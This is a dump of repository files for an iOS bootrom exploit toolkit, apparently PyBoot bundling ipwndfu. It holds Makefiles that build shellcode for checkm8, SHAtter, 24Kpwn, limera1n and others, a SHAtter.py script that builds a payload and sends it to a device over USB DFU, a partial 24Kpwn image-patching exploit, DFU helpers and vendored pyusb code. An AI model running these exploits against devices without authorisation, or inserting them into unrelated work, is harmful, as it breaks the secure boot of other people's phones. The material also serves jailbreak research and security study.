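# phony; otherwise a stray file called e.g. "arm64" would stop the rebuild.
.PHONY: all armv6 armv7 arm64

all: armv6 armv7 arm64

armv6:
	arm-none-eabi-as -march=armv6 -mthumb --fatal-warnings -o bin/steaks4uce-shellcode.o src/steaks4uce-shellcode.S
	arm-none-eabi-objcopy -O binary bin/steaks4uce-shellcode.o bin/steaks4uce-shellcode.bin
	rm bin/steaks4uce-shellcode.o

armv7:
	arm-none-eabi-as -mthumb --fatal-warnings -o bin/limera1n-shellcode.o src/limera1n-shellcode.S
	arm-none-eabi-objcopy -O binary bin/limera1n-shellcode.o bin/limera1n-shellcode.bin
	rm bin/limera1n-shellcode.o

	arm-none-eabi-as -mthumb --fatal-warnings -o bin/SHAtter-shellcode.o src/SHAtter-shellcode.S
	arm-none-eabi-objcopy -O binary bin/SHAtter-shellcode.o bin/SHAtter-shellcode.bin
	rm bin/SHAtter-shellcode.o

	arm-none-eabi-as -mthumb --fatal-warnings -o bin/24Kpwn-shellcode.o src/24Kpwn-shellcode.S
	arm-none-eabi-objcopy -O binary bin/24Kpwn-shellcode.o bin/24Kpwn-shellcode.bin
	rm bin/24Kpwn-shellcode.o

	arm-none-eabi-as -mthumb --fatal-warnings -o bin/alloc8-shellcode.o src/alloc8-shellcode.S
	arm-none-eabi-objcopy -O binary bin/alloc8-shellcode.o bin/alloc8-shellcode.bin
	rm bin/alloc8-shellcode.o

	arm-none-eabi-as -mthumb --fatal-warnings -o bin/ibss-flash-nor-shellcode.o src/ibss-flash-nor-shellcode.S
	arm-none-eabi-objcopy -O binary bin/ibss-flash-nor-shellcode.o bin/ibss-flash-nor-shellcode.bin
	rm bin/ibss-flash-nor-shellcode.o

	arm-none-eabi-as -mthumb --fatal-warnings -o bin/usb_0xA1_2_armv7.o src/usb_0xA1_2_armv7.S
	arm-none-eabi-objcopy -O binary bin/usb_0xA1_2_armv7.o bin/usb_0xA1_2_armv7.bin
	rm bin/usb_0xA1_2_armv7.o

	arm-none-eabi-as -mthumb --fatal-warnings -o bin/checkm8_armv7.o src/checkm8_armv7.S
	arm-none-eabi-objcopy -O binary bin/checkm8_armv7.o bin/checkm8_armv7.bin
	rm bin/checkm8_armv7.o

arm64:
	xcrun -sdk iphoneos clang src/usb_0xA1_2_arm64.S -target arm64-apple-darwin -Wall -o bin/usb_0xA1_2_arm64.o
	gobjcopy -O binary -j .text bin/usb_0xA1_2_arm64.o bin/usb_0xA1_2_arm64.bin
	rm bin/usb_0xA1_2_arm64.o

	xcrun -sdk iphoneos clang src/checkm8_arm64.S -target arm64-apple-darwin -Wall -o bin/checkm8_arm64.o
	gobjcopy -O binary -j .text bin/checkm8_arm64.o bin/checkm8_arm64.bin
	rm bin/checkm8_arm64.o

	xcrun -sdk iphoneos clang src/t8010_t8011_disable_wxn_arm64.S -target arm64-apple-darwin -Wall -o bin/t8010_t8011_disable_wxn_arm64.o
	gobjcopy -O binary -j .text bin/t8010_t8011_disable_wxn_arm64.o bin/t8010_t8011_disable_wxn_arm64.bin
	rm bin/t8010_t8011_disable_wxn_arm64.o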
49 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/SHAtter.py:
--------------------------------------------------------------------------------
1 | # Credit: This file is based on SHAtter exploit (segment overflow) by posixninja and pod2g.
2 |
3 | import struct, sys, time
4 | import dfu
5 |
def generate_payload():
    """Build and return the byte string that exploit() hands to dfu.send_data().

    The result is ``header + tags + shellcode``. The shellcode is read from
    'bin/SHAtter-shellcode.bin', a path relative to the current working
    directory, and must be at most 1024 bytes long.
    """
    shellcode_address = 0x8402F198 + 1
    data = struct.pack('<40sI', '\xF0' * 40, shellcode_address)
    # The four-character tag names are packed reversed ([::-1]).
    tags = data + struct.pack('<4s2I4s2I', 'SHSH'[::-1], 12, 0, 'CERT'[::-1], 12, 0)
    header = struct.pack('<4s3I4s', 'Img3'[::-1], 20 + len(tags), len(tags), len(data), 'ibss'[::-1])
    # NOTE(review): the blob is loaded from disk with no integrity check, so
    # whatever sits at this path is what gets sent to the device.
    with open('bin/SHAtter-shellcode.bin', 'rb') as f:
        shellcode = f.read()
    # As an assert, this size limit is not enforced when Python runs with -O.
    assert len(shellcode) <= 1024
    return header + tags + shellcode
15 |
def exploit():
    """Run the SHAtter sequence against the device returned by dfu.acquire_device().

    The device's USB serial-number string is the only thing inspected to
    decide whether to proceed: the function returns early if it already
    contains 'PWND:[', and exits with status 1 unless it contains both
    'CPID:8930' and 'SRTG:[iBoot-574.4]'. After the request sequence it
    re-reads the serial-number string and exits with status 1 unless
    'PWND:[SHAtter]' is present.
    """
    print '*** based on SHAtter exploit (segment overflow) by posixninja and pod2g ***'

    device = dfu.acquire_device()
    print 'Found:', device.serial_number

    # A 'PWND:[' marker in the serial-number string is how this tool
    # recognises a device that is already in the modified state.
    if 'PWND:[' in device.serial_number:
        print 'Device is already in pwned DFU Mode. Not executing exploit.'
        return

    # Hard gate on the chip identifier reported by the device.
    if 'CPID:8930' not in device.serial_number:
        print 'ERROR: Not a compatible device. This exploit is for S5L8930 devices only. Exiting.'
        sys.exit(1)

    # Hard gate on the boot-stage string reported by the device.
    if 'SRTG:[iBoot-574.4]' not in device.serial_number:
        print 'ERROR: CPID is compatible, but serial number string does not match.'
        print 'Make sure device is in SecureROM DFU Mode and not LLB/iBSS DFU Mode. Exiting.'
        sys.exit(1)

    # From here on the order of requests and of release/re-acquire steps is
    # part of the procedure; the statements are reproduced unchanged.
    dfu.reset_counters(device)
    dfu.get_data(device, 0x40)
    dfu.usb_reset(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    dfu.request_image_validation(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    dfu.get_data(device, 0x2C000)
    dfu.release_device(device)

    time.sleep(0.5)

    device = dfu.acquire_device()
    dfu.reset_counters(device)
    dfu.get_data(device, 0x140)
    dfu.usb_reset(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    dfu.request_image_validation(device)
    dfu.release_device(device)

    device = dfu.acquire_device()
    dfu.send_data(device, generate_payload())
    dfu.get_data(device, 0x2C000)
    dfu.release_device(device)

    time.sleep(0.5)

    # Success is judged solely by the marker in the re-read serial-number string.
    device = dfu.acquire_device()
    failed = 'PWND:[SHAtter]' not in device.serial_number
    dfu.release_device(device)

    if failed:
        print 'ERROR: Exploit failed. Device did not enter pwned DFU Mode.'
        sys.exit(1)

    print 'Device is now in pwned DFU Mode.'
76 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/aes-keys/S5L8920-firmware:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/aes-keys/S5L8920-firmware
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/24Kpwn-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/24Kpwn-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/SHAtter-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/SHAtter-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/alloc8-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/alloc8-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/checkm8_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/checkm8_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/checkm8_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/checkm8_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/ibss-flash-nor-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/ibss-flash-nor-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/limera1n-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/limera1n-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/steaks4uce-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/steaks4uce-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/t8010_t8011_disable_wxn_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/t8010_t8011_disable_wxn_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/usb_0xA1_2_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/usb_0xA1_2_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/bin/usb_0xA1_2_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu8010/bin/usb_0xA1_2_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfu8010/dfu.py:
--------------------------------------------------------------------------------
1 | import sys, time
2 | import usb # pyusb: use 'pip install pyusb' to install this module
3 | import usb.backend.libusb1
4 | import libusbfinder
5 |
# Largest chunk (0x800 = 2048) that send_data() and get_data() move in a
# single control transfer.
MAX_PACKET_SIZE = 0x800
7 |
def acquire_device(timeout=5.0, match=None, fatal=True):
    """Find a USB device with idVendor 0x5AC and idProduct 0x1227 and return it.

    Args:
        timeout: seconds to keep polling; at least one scan always runs.
        match: if not None, only a device whose serial_number contains this
            substring is accepted.
        fatal: if true, print an error and exit with status 1 when nothing
            is found; otherwise return None.

    Returns:
        The first matching device object, or None (only when *fatal* is false).
    """
    # The libusb1 backend is loaded from the path reported by libusbfinder.
    backend = usb.backend.libusb1.get_backend(find_library=lambda x:libusbfinder.libusb1_path())
    #print 'Acquiring device handle.'
    # Keep retrying for up to timeout seconds if device is not found.
    start = time.time()
    once = False
    while not once or time.time() - start < timeout:
        # 'once' guarantees a first scan even when timeout is 0 or negative.
        once = True
        for device in usb.core.find(find_all=True, idVendor=0x5AC, idProduct=0x1227, backend=backend):
            if match is not None and match not in device.serial_number:
                continue
            return device
        # Short pause between scans.
        time.sleep(0.001)
    if fatal:
        print 'ERROR: No Apple device in DFU Mode 0x1227 detected after %0.2f second timeout. Exiting.' % timeout
        sys.exit(1)
    return None
25 |
def release_device(device):
    """Hand ``device`` to ``usb.util.dispose_resources`` to release its resources."""
    usb.util.dispose_resources(device)
29 |
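def reset_counters(device):
    """Issue control request 4 (bmRequestType 0x21) and require a result of 0.

    Request 4 is presumably DFU_CLRSTATUS from the USB DFU class
    specification; confirm against the device documentation.

    Raises:
        AssertionError: if ``ctrl_transfer`` returns anything other than 0.
    """
    # The transfer is made outside of an ``assert`` statement: ``python -O``
    # strips asserts together with any call made inside them, which would
    # silently turn this function into a no-op.
    status = device.ctrl_transfer(0x21, 4, 0, 0, 0, 1000)
    if status != 0:
        raise AssertionError('unexpected ctrl_transfer result: %r' % (status,))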
33 |
def usb_reset(device):
    """Call ``device.reset()`` and ignore a ``usb.core.USBError`` it raises."""
    try:
        device.reset()
    except usb.core.USBError:
        # OK: doesn't happen on Yosemite but happens on El Capitan and Sierra
        pass
42 |
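def send_data(device, data):
    """Write ``data`` to ``device`` in chunks of at most MAX_PACKET_SIZE.

    Each chunk is sent with control request 1 and bmRequestType 0x21
    (presumably DFU_DNLOAD; confirm against the DFU class specification).

    Raises:
        AssertionError: if a transfer reports a length other than the chunk
            size that was submitted.
    """
    index = 0
    while index < len(data):
        amount = min(len(data) - index, MAX_PACKET_SIZE)
        # Keep the transfer outside of ``assert``: under ``python -O`` an
        # assert and the call inside it are removed, and nothing is sent.
        written = device.ctrl_transfer(0x21, 1, 0, 0, data[index:index + amount], 5000)
        if written != amount:
            raise AssertionError('short write: %r of %r bytes' % (written, amount))
        index += amount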
50 |
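def get_data(device, amount):
    """Read ``amount`` bytes from ``device`` and return them as one string.

    Data is requested in chunks of at most MAX_PACKET_SIZE with control
    request 2 and bmRequestType 0xA1 (presumably DFU_UPLOAD; confirm
    against the DFU class specification).

    Raises:
        AssertionError: if a chunk comes back shorter or longer than
            requested.
    """
    chunks = []
    while amount > 0:
        part = min(amount, MAX_PACKET_SIZE)
        ret = device.ctrl_transfer(0xA1, 2, 0, 0, part, 5000)
        # Explicit check instead of ``assert`` so a short read is still
        # detected under ``python -O``; otherwise ``amount`` would be
        # decremented by more than was actually received.
        if len(ret) != part:
            raise AssertionError('short read: %r of %r bytes' % (len(ret), part))
        chunks.append(ret.tostring())
        amount -= part
    # Join once instead of growing a string with += on every chunk.
    return str().join(chunks)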
61 |
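def request_image_validation(device):
    """Send an empty request-1 transfer, poll request 3 three times, reset.

    The empty transfer uses bmRequestType 0x21; each poll reads 6 bytes
    with bmRequestType 0xA1 (presumably DFU_GETSTATUS; confirm against the
    DFU class specification). The poll results are not inspected. The
    port is reset afterwards through ``usb_reset``.

    Raises:
        AssertionError: if the empty transfer does not report 0.
    """
    # Made outside of ``assert`` so the transfer still happens under
    # ``python -O``, which removes assert statements entirely.
    status = device.ctrl_transfer(0x21, 1, 0, 0, '', 1000)
    if status != 0:
        raise AssertionError('unexpected ctrl_transfer result: %r' % (status,))
    for _ in range(3):
        device.ctrl_transfer(0xA1, 3, 0, 0, 6, 1000)
    usb_reset(device)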
69 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/image3_24Kpwn.py:
--------------------------------------------------------------------------------
1 | # Credit: This file is based on 24Kpwn exploit (segment overflow) by chronic, CPICH, ius, MuscleNerd, Planetbeing, pod2g, posixninja, et al.
2 |
3 | import struct
4 | import image3
5 |
6 | def exploit(img3, securerom):
7 | with open('bin/24Kpwn-shellcode.bin', 'rb') as f:
8 | shellcode = f.read()
9 | MAX_SHELLCODE_LENGTH = 1024
10 | assert len(shellcode) <= MAX_SHELLCODE_LENGTH
11 |
12 | # Check IMG3 constraints.
13 | (img3_magic, total_size, data_size, signed_size, magic) = struct.unpack('<4s3I4s', img3[:20])
14 | assert img3_magic == 'Img3'[::-1] and signed_size != 0 and magic == 'illb'[::-1]
15 | assert total_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12
16 | assert data_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12 - 20
17 | assert signed_size < 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - 12 - 20
18 | assert 20 + signed_size + 4 <= len(img3) and img3[20 + signed_size:20 + signed_size + 4] == 'SHSH'[::-1]
19 |
20 | PADDING = 0x24000 - (4 + 12 + 64 + 12 + 12) - len(shellcode) - (20 + signed_size + 12)
21 | SHELLCODE_ADDRESS = 0x84000000 + 1 + (20 + signed_size + 12 + PADDING)
22 | STACK_ADDRESS = 0x84033EA4
23 | img3 = struct.pack('<4s3I4s', 'Img3'[::-1], 0x24200, 0x241BC, 0x23F88, 'illb'[::-1]) + img3[20:20 + signed_size] \
24 | + struct.pack('4s2I%sx' % PADDING, '24KP'[::-1], 12 + PADDING + len(shellcode) + 4, PADDING + len(shellcode) + 4) + shellcode \
25 | + struct.pack(' 0x24000
32 | assert img3[16:20] == 'illb'[::-1]
33 |
34 | obj = image3.Image3(img3)
35 | if obj.getDecryptedPayload()[:4] != '\x0e\x00\x00\xea':
36 | # This is a 24Kpwn implementation which changes DATA tag. First dword of DATA tag should look like a shellcode address.
37 | shellcode_address, = struct.unpack('= logger.getEffectiveLevel():
58 | fn = type(args[0]).__name__ + '.' + f.__name__
59 | _trace_function_call(logger, fn, *args[1:], **named_args)
60 | return f(*args, **named_args)
61 | _interop._update_wrapper(do_trace, f)
62 | return do_trace
63 | return decorator_logging
64 |
65 | # decorator for function call tracing
def functiontrace(logger):
    """Build a decorator that traces calls to a plain function on ``logger``.

    When the module-level ``_enable_tracing`` flag is false the decorated
    function is returned unchanged. Otherwise each call is first passed to
    ``_trace_function_call`` (only if ``logger`` is effective at DEBUG or
    lower) and then forwarded to the wrapped function.

    NOTE(review): the call's positional and keyword arguments are handed to
    the tracing helper; presumably they end up in the log, so DEBUG logs may
    contain transferred buffers -- confirm before enabling in production.
    """
    def decorator_logging(f):
        if _enable_tracing:
            def do_trace(*args, **named_args):
                # Level test first, to skip string formatting when DEBUG is off.
                debug_on = logger.getEffectiveLevel() <= logging.DEBUG
                if debug_on:
                    _trace_function_call(logger, f.__name__, *args, **named_args)
                return f(*args, **named_args)
            _interop._update_wrapper(do_trace, f)
            return do_trace
        return f
    return decorator_logging
78 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/usb/_interop.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Wander Lairson Costa
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | # All the hacks necessary to assure compatibility across all
30 | # supported versions come here.
31 | # Please, note that there is one version check for each
32 | # hack we need to do, this makes maintenance easier... ^^
33 |
34 | import sys
35 | import array
36 |
# NOTE(review): _all and as_array are defined in this module but are not
# listed here, so a star-import does not export them.
__all__ = ['_reduce', '_set', '_next', '_update_wrapper']

# we support Python >= 2.4
# NOTE(review): the version gate is an assert, so it is skipped when the
# interpreter runs with -O.
assert sys.hexversion >= 0x020400f0

# On Python 3, reduce became a functools module function
try:
    import functools
    _reduce = functools.reduce
except (ImportError, AttributeError):
    # No functools, or no functools.reduce: fall back to the builtin.
    _reduce = reduce

# all, introduced in Python 2.5
try:
    _all = all
except NameError:
    # Emulation: fold the items with "and", starting from True.
    _all = lambda iter_ : _reduce( lambda x, y: x and y, iter_, True )

# we only have the builtin set type since 2.5 version
try:
    _set = set
except NameError:
    import sets
    _set = sets.Set
61 |
62 | # On Python >= 2.6, we have the builtin next() function
63 | # On Python 2.5 and before, we have to call the iterator method next()
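def _next(iter):
    """Return the next item of ``iter``.

    Uses the builtin ``next()`` when the interpreter has one and falls back
    to the iterator's ``next()`` method otherwise. ``StopIteration`` and any
    other exception raised by the iterator propagate to the caller.
    """
    # Probe for the builtin separately from the call. Wrapping the call
    # itself in ``except NameError`` would also swallow a NameError raised
    # inside the iterator's own code and hide the real failure.
    try:
        advance = next
    except NameError:
        return iter.next()
    return advance(iter)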
69 |
70 | # functools appeared in 2.5
try:
    import functools
    _update_wrapper = functools.update_wrapper
except (ImportError, AttributeError):
    # Fallback used only when functools or functools.update_wrapper is missing.
    def _update_wrapper(wrapper, wrapped):
        # Copy the identifying attributes of ``wrapped`` onto ``wrapper``.
        # Unlike the functools version bound above, this fallback has no
        # return statement, so callers must not rely on a return value.
        wrapper.__name__ = wrapped.__name__
        wrapper.__module__ = wrapped.__module__
        wrapper.__doc__ = wrapped.__doc__
        # Rebinds __dict__ to the same object, so both functions share one
        # attribute dictionary afterwards.
        wrapper.__dict__ = wrapped.__dict__
80 |
81 | # this is used (as of May 2015) twice in core, once in backend/openusb, and in
82 | # some unit test code. It would probably be clearer if written in terms of some
83 | # definite 3.2+ API (bytearrays?) with a fallback provided for 2.4+.
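def as_array(data=None):
    """Return ``data`` as an ``array.array`` with typecode 'B'.

    ``None`` yields an empty array, an existing ``array.array`` is returned
    unchanged (not copied), and anything else is passed to the array
    constructor. Input the constructor rejects with ``TypeError`` (for
    example a text string) is loaded through ``frombytes``/``fromstring``.
    """
    if data is None:
        return array.array('B')

    if isinstance(data, array.array):
        return data

    try:
        return array.array('B', data)
    except TypeError:
        # When you pass a unicode string or a character sequence,
        # you get a TypeError if the first parameter does not match
        a = array.array('B')
        if hasattr(a, 'frombytes'):
            # fromstring() is deprecated since 3.2 and gone in 3.9.
            # frombytes() only takes bytes-like input, so text is encoded
            # as UTF-8 first.
            if isinstance(data, str):
                data = data.encode('utf-8')
            a.frombytes(data)
        else:
            # Interpreters without frombytes() keep the original call.
            a.fromstring(data)
        return a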
99 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/usb/_lookup.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2009-2014 Walker Inman
2 | #
3 | # The following terms apply to all files associated
4 | # with the software unless explicitly disclaimed in individual files.
5 | #
6 | # The authors hereby grant permission to use, copy, modify, distribute,
7 | # and license this software and its documentation for any purpose, provided
8 | # that existing copyright notices are retained in all copies and that this
9 | # notice is included verbatim in any distributions. No written agreement,
10 | # license, or royalty fee is required for any of the authorized uses.
11 | # Modifications to this software may be copyrighted by their authors
12 | # and need not follow the licensing terms described here, provided that
13 | # the new terms are clearly indicated on the first page of each file where
14 | # they apply.
15 | #
16 | # IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY
17 | # FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES
18 | # ARISING OUT OF THE USE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY
19 | # DERIVATIVES THEREOF, EVEN IF THE AUTHORS HAVE BEEN ADVISED OF THE
20 | # POSSIBILITY OF SUCH DAMAGE.
21 | #
22 | # THE AUTHORS AND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES,
23 | # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,
24 | # FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE
25 | # IS PROVIDED ON AN "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE
26 | # NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR
27 | # MODIFICATIONS.
28 |
29 | r"""usb._lookups - Lookup tables for USB
30 | """
31 |
# Display names keyed by numeric code. Presumably the keys are USB
# descriptor type codes -- confirm against the callers.
descriptors = {
    0x1 : "Device",
    0x2 : "Configuration",
    0x3 : "String",
    0x4 : "Interface",
    0x5 : "Endpoint",
    0x6 : "Device qualifier",
    0x7 : "Other speed configuration",
    0x8 : "Interface power",
    0x9 : "OTG",
    0xA : "Debug",
    0xB : "Interface association",
    0xC : "Security",
    0xD : "Key",
    0xE : "Encryption type",
    0xF : "Binary device object store (BOS)",
    0x10 : "Device capability",
    0x11 : "Wireless endpoint companion",
    0x30 : "SuperSpeed endpoint companion",
}

# Display names for device-level class codes. The table is sparse: a
# lookup of an unlisted code raises KeyError unless the caller uses .get().
device_classes = {
    0x0 : "Specified at interface",
    0x2 : "Communications Device",
    0x9 : "Hub",
    0xF : "Personal Healthcare Device",
    0xDC : "Diagnostic Device",
    0xE0 : "Wireless Controller",
    0xEF : "Miscellaneous",
    0xFF : "Vendor-specific",
}

# Display names for interface-level class codes. Also sparse (0x4 and 0xC,
# among others, have no entry).
interface_classes = {
    0x0 : "Reserved",
    0x1 : "Audio",
    0x2 : "CDC Communication",
    0x3 : "Human Interface Device",
    0x5 : "Physical",
    0x6 : "Image",
    0x7 : "Printer",
    0x8 : "Mass Storage",
    0x9 : "Hub",
    0xA : "CDC Data",
    0xB : "Smart Card",
    0xD : "Content Security",
    0xE : "Video",
    0xF : "Personal Healthcare",
    0xDC : "Diagnostic Device",
    0xE0 : "Wireless Controller",
    0xEF : "Miscellaneous",
    0xFE : "Application Specific",
    0xFF : "Vendor Specific",
}

# Display names for the four endpoint transfer types. Presumably indexed by
# the low two bits of an endpoint's bmAttributes -- confirm against callers.
ep_attributes = {
    0x0 : "Control",
    0x1 : "Isochronous",
    0x2 : "Bulk",
    0x3 : "Interrupt",
}

# Presumably the number of mA represented by one unit of a configuration's
# bMaxPower field, per bus speed -- confirm against callers.
MAX_POWER_UNITS_USB2p0 = 2 # mA
MAX_POWER_UNITS_USB_SUPERSPEED = 8 # mA
95 |
--------------------------------------------------------------------------------
/resources/ipwndfu8010/utilities.py:
--------------------------------------------------------------------------------
1 | import subprocess, sys
2 |
def apply_patches(binary, patches):
    """Return ``binary`` with every ``(offset, data)`` patch overlaid in order.

    Each patch replaces ``len(data)`` items starting at ``offset``. No bounds
    check is made: an offset past the end appends ``data`` instead of
    failing, and a negative offset is interpreted by slice semantics.
    """
    patched = binary
    for entry in patches:
        start, replacement = entry
        stop = start + len(replacement)
        patched = patched[:start] + replacement + patched[stop:]
    return patched
7 |
def aes_decrypt(data, iv, key):
    """Decrypt ``data`` with AES-CBC by piping it through the ``openssl`` CLI.

    ``key`` and ``iv`` are passed to ``openssl enc`` as ``-K`` and ``-iv``.
    A 32-character key selects AES-128 and a 64-character key AES-256; any
    other length prints an error and exits with status 1. Padding is not
    removed (``-nopad``). A non-zero exit status or any output on stderr is
    treated as failure and also exits the process.

    NOTE(review): the key and IV are command-line arguments of the child
    process, so other local users able to list processes can read them
    while openssl runs.
    """
    bits_by_key_length = {32: 128, 64: 256}
    if len(key) not in bits_by_key_length:
        print 'ERROR: Bad AES key given to aes_decrypt. Exiting.'
        sys.exit(1)
    aes = bits_by_key_length[len(key)]

    command = ['openssl', 'enc', '-aes-%s-cbc' % aes, '-d', '-nopad', '-iv', iv, '-K', key]
    p = subprocess.Popen(command,
                         stdout=subprocess.PIPE,
                         stdin=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    stdout, stderr = p.communicate(input=data)

    failed = p.returncode != 0 or len(stderr) > 0
    if failed:
        print 'ERROR: openssl failed: %s' % stderr
        sys.exit(1)

    return stdout
28 |
def hex_dump(data, address):
    """Return the ``xxd`` hex dump of ``data``, with offsets shifted by ``address``.

    ``data`` is piped to ``xxd -o <address>``. A non-zero exit status or any
    output on stderr prints an error and exits the process with status 1.
    """
    command = ['xxd', '-o', str(address)]
    p = subprocess.Popen(command,
                         stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    stdout, stderr = p.communicate(input=data)

    failed = p.returncode != 0 or len(stderr) > 0
    if failed:
        print 'ERROR: xxd failed: %s' % stderr
        sys.exit(1)

    return stdout
38 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | nor-backups/nor-*
3 | libusbfinder/libusb-*
4 | SecureROM-*
5 | n88ap-iBSS-4.3.5.img3
6 | *.ipsw
7 |
--------------------------------------------------------------------------------
/resources/ipwndfuKeys/Makefile:
--------------------------------------------------------------------------------
1 | all: armv6 armv7 arm64
2 |
3 | armv6:
4 | arm-none-eabi-as -march=armv6 -mthumb --fatal-warnings -o bin/steaks4uce-shellcode.o src/steaks4uce-shellcode.S
5 | arm-none-eabi-objcopy -O binary bin/steaks4uce-shellcode.o bin/steaks4uce-shellcode.bin
6 | rm bin/steaks4uce-shellcode.o
7 |
8 | armv7:
9 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/limera1n-shellcode.o src/limera1n-shellcode.S
10 | arm-none-eabi-objcopy -O binary bin/limera1n-shellcode.o bin/limera1n-shellcode.bin
11 | rm bin/limera1n-shellcode.o
12 |
13 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/SHAtter-shellcode.o src/SHAtter-shellcode.S
14 | arm-none-eabi-objcopy -O binary bin/SHAtter-shellcode.o bin/SHAtter-shellcode.bin
15 | rm bin/SHAtter-shellcode.o
16 |
17 | arm-none-eabi-as -mthumb --fatal-warnings -o bin/24Kpwn-shellcode.o src/24Kpwn-shellcode.S
18 | arm-none-eabi-objcopy -O binary bin/24Kpwn-shellcode.o bin/24Kpwn-shellcode.bin
19 | rm bin/24Kpwn-shellcode.o
20 |
